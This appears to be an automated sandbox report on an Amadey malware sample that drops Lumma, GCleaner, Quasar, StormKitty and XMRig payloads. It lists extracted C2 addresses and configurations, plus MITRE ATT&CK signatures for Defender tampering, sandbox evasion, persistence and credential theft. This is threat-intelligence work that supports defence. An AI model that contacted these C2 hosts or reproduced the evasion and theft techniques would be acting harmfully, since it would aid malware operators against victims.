amadey | 39758b8ddcb91ee136b9e73307ec8e8d7dc9f2680972ee0a79050722e28b055b

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
03/04/2025, 15:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

random.exe
Size

1.8MB
MD5

04be93738192adabbdcd46d76b3848d7
SHA1

9c44bb29ed0be6e8eca1a2ca6f46f348c9f38e7e
SHA256

39758b8ddcb91ee136b9e73307ec8e8d7dc9f2680972ee0a79050722e28b055b
SHA512

24e8df74fc2e5b794c78579830ec7f179669dfe9be5a6566cf3e0b8aeaa3c379f5a130b69755903eb2529074ea3279456c327db0c75356b2bd844184616110dc
SSDEEP

24576:B5Ie8Zjvbu0BHF/+wxa1NpwQ2Ko0lAyqNCEDLWKtHWxj0H1jNWruuIzwnKJ3ALAj:Pktnx2NgK9hqNC4LFsy1I5cw+ALACS6

Malware Config

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

https://tacticaltalks.live/glKShay

https://metalsyo.digital/opsa

https://iironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://starcloc.bet/GOksAo

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://xrfxcaseq.live/gspaz

https://jrxsafer.top/shpaoz

https://krxspint.digital/kendwz

https://rhxhube.run/pogrs

https://6grxeasyw.digital/xxepw

https://ywmedici.top/noagis

https://ironloxp.live/aksdd

https://gspacedbv.world/EKdlsk

https://1galxnetb.today/GsuIAo

Extracted

Family

gcleaner

185.156.73.98

45.91.200.135

Extracted

Family

quasar

Version

1.5.0

Botnet

Office04

goku92ad.zapto.org:5000

Mutex

a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a

Attributes

encryption_key
BF72099FDBC6B48816529089CF1CF2CF86357D14
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Modded Client Startup
subdirectory
SubDir

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Gcleaner family
gcleaner
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Modifies security service 2 TTPs 2 IoCs

defense_evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral1/memory/2560-732-0x000000000CAC0000-0x000000000CC14000-memory.dmp	family_quasar
behavioral1/memory/2560-733-0x00000000055D0000-0x00000000055EA000-memory.dmp	family_quasar

StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0035000000023f71-188.dat	family_stormkitty
behavioral1/memory/4000-201-0x0000000000BE0000-0x0000000000C1C000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty
Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Contacts a large (8930) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	random.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe

XMRig Miner payload 9 IoCs

miner

resource	yara_rule
behavioral1/memory/4832-159-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/4832-158-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/4832-157-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/4832-156-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/4832-155-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/4832-153-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/4832-152-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/4832-400-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/4832-397-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2700	powershell.exe
3156	powershell.exe
3400	powershell.exe
4364	powershell.exe
2548	powershell.exe
4768	powershell.exe
3756	powershell.exe
2620	powershell.exe
2560	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 4 IoCs

flow	pid	Process
24	1456	rapes.exe
24	1456	rapes.exe
66	1456	rapes.exe
66	1456	rapes.exe

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\etc\hosts	P3Ow4LV.exe
File created	C:\Windows\system32\drivers\etc\hosts	updater.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
3448	takeown.exe
1036	icacls.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 6 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation	apple.exe
Key value queried	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation	261.exe
Key value queried	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation	261.exe
Key value queried	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation	random.exe
Key value queried	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation	rapes.exe

Executes dropped EXE 11 IoCs

pid	Process
1456	rapes.exe
3148	apple.exe
3612	261.exe
3140	261.exe
2708	P3Ow4LV.exe
5108	rapes.exe
3292	updater.exe
4772	9sWdA2p.exe
3916	i4cwegu.exe
4000	Yhihb8G.exe
700	j31kf1f.exe

Identifies Wine through registry keys 2 TTPs 3 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine	random.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
3448	takeown.exe
1036	icacls.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	76.250.73.173

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Yhihb8G.exe
Key opened	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Yhihb8G.exe
Key opened	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Yhihb8G.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 5 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4294	ipinfo.io
4332	ipinfo.io
67	ipinfo.io
68	ipinfo.io
145	ip-api.com

Power Settings 1 TTPs 12 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
3224	powercfg.exe
4896	powercfg.exe
4108	powercfg.exe
3224	powercfg.exe
2612	powercfg.exe
3852	powercfg.exe
1336	powercfg.exe
2800	powercfg.exe
4644	powercfg.exe
3844	powercfg.exe
3748	powercfg.exe
4104	powercfg.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	updater.exe
File opened for modification	C:\Windows\system32\MRT.exe	P3Ow4LV.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
4916	random.exe
1456	rapes.exe
5108	rapes.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 3292 set thread context of 4400	3292	updater.exe	226
PID 3292 set thread context of 4832	3292	updater.exe	231

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4832-147-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4832-149-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4832-159-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4832-158-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4832-157-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4832-156-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4832-155-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4832-153-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4832-152-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4832-151-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4832-150-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4832-148-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4832-400-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4832-397-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui	cmd.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	random.exe

Launches sc.exe 59 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5076	sc.exe
4572	sc.exe
4372	sc.exe
680	sc.exe
4412	sc.exe
4492	sc.exe
2244	sc.exe
4316	sc.exe
4464	sc.exe
1540	sc.exe
2164	sc.exe
1352	sc.exe
3624	sc.exe
2928	sc.exe
3784	sc.exe
1452	sc.exe
2992	sc.exe
3224	sc.exe
3292	sc.exe
4504	sc.exe
4916	sc.exe
5112	sc.exe
4364	sc.exe
512	sc.exe
3556	sc.exe
1944	sc.exe
1688	sc.exe
4148	sc.exe
4320	sc.exe
2196	sc.exe
672	sc.exe
3976	sc.exe
4512	sc.exe
4228	sc.exe
5100	sc.exe
4168	sc.exe
3784	sc.exe
4104	sc.exe
1672	sc.exe
4496	sc.exe
1316	sc.exe
2360	sc.exe
3372	sc.exe
2580	sc.exe
2156	sc.exe
4024	sc.exe
4104	sc.exe
3424	sc.exe
4500	sc.exe
1272	sc.exe
864	sc.exe
4736	sc.exe
2836	sc.exe
3548	sc.exe
652	sc.exe
700	sc.exe
4404	sc.exe
2168	sc.exe
2472	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Program crash 2 IoCs

pid	pid_target	Process	procid_target
4896	4000	WerFault.exe	235
4840	3584	WerFault.exe	263

System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	random.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	261.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	261.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9sWdA2p.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i4cwegu.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Yhihb8G.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
968	cmd.exe
1808	netsh.exe
2852	cmd.exe
1384	netsh.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Yhihb8G.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Yhihb8G.exe

Delays execution with timeout.exe 2 IoCs

defense_evasion

pid	Process
2708	timeout.exe
1676	timeout.exe

Modifies data under HKEY_USERS 46 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
540	schtasks.exe
2712	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4916	random.exe
4916	random.exe
1456	rapes.exe
1456	rapes.exe
5108	rapes.exe
5108	rapes.exe
2708	P3Ow4LV.exe
2700	powershell.exe
2700	powershell.exe
2700	powershell.exe
2708	P3Ow4LV.exe
2708	P3Ow4LV.exe
2708	P3Ow4LV.exe
2708	P3Ow4LV.exe
2708	P3Ow4LV.exe
2708	P3Ow4LV.exe
2708	P3Ow4LV.exe
2708	P3Ow4LV.exe
2708	P3Ow4LV.exe
2708	P3Ow4LV.exe
2708	P3Ow4LV.exe
2708	P3Ow4LV.exe
2708	P3Ow4LV.exe
2708	P3Ow4LV.exe
